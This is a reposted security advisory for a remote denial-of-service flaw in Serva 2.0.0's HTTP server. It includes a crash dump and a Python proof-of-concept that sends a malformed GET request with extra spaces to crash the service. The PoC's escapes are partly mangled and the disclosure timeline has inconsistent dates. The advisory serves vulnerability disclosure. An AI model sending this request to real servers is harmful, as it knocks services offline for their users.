Home / exploitsPDF  

Serva 2.0.0 HTTP Server Denial Of Service

Posted on 15 January 2013

Inshell Security Advisory
http://www.inshell.net

1. ADVISORY INFORMATION
-----------------------
Product: Serva
Vendor URL: www.vercot.com
Type: Uncaught Exception [CWE-248]
Date found: 2012-12-07
Date published: 2013-01-14
CVSSv2 Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE: -

2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.

3. VERSIONS AFFECTED
--------------------
Serva 2.0.0, older versions may be affected too.

4. VULNERABILITY DESCRIPTION
----------------------------
Serva v2.0.0 suffers from a Remote Denial of Service Vulnerability in
the HTTP module.

The application uses a space delimiter to parse a GET Request. Adding
more than one space (x20) behind the GET will cause the application to
crash with an unhandled c++ exception.

(b50.18c): Unknown exception - code 000006d9 (first chance)
(b50.a9c): C++ EH exception - code e06d7363 (first chance)
(b50.a9c): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=017d6668 ebx=00000000 ecx=00000000 edx=00000003 esi=017d66f0
edi=ffffffff
eip=7c812afb esp=017d6664 ebp=017d66b8 iopl=0 nv up ei pl nz na
pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000206
kernel32!RaiseException+0x53:
7c812afb 5e pop esi

5. PROOF-OF-CONCEPT (CODE / Exploit)
------------------------------------
#!/usr/bin/python
import socket

target="192.168.0.21"
port=80

# 0000 47 45 54 20 20 2f 20 48 54 54 50 2f 31 2e 31 0d GET / HTTP/1.1.
# 0010 0a 48 6f 73 74 3a 20 68 74 74 70 3a 2f 2f 31 39 .Host: http://19
# 0020 32 2e 31 36 38 2e 30 2e 32 31 0d 0a 43 6f 6e 74 2.168.0.21..Cont
# 0030 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d ent-Length: 0...
# 0040 0a .

payload = (
"x47x45x54x20x20x2fx20x48x54x54x50x2fx31x2ex31x0d"+
"x0ax48x6fx73x74x3ax20x68x74x74x70x3ax2fx2fx31x39"+
"x32x2ex31x36x38x2ex30x2ex32x31x0dx0ax43x6fx6ex74"+
"x65x6ex74x2dx4cx65x6ex67x74x68x3ax20x30x0dx0ax0d"+
"x0a"
)

print "[*] Connecting to Target " + target + "..."

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
 connect=s.connect((target, port))
 print "[*] Connected to " + target + "!"
except:
 print "[!] " + target + " didn't respond
"
 sys.exit(0)

print "[*] Sending malformed request..."

s.send(payload)

print "[!] Exploit has been sent!
"
s.close()

For further Screenshots and/or PoCs visit:
http://security.inshell.net/advisory/34

6. SOLUTION
-----------
None

7. REPORT TIMELINE
------------------
2012-12-07: Initial notification sent to vendor
2012-07-18: Vendor does not accept the bug
2013-01-14: Full Disclosure

8. REFERENCES
-------------
http://security.inshell.net/advisory/34

 

TOP

Malware :

Exploits :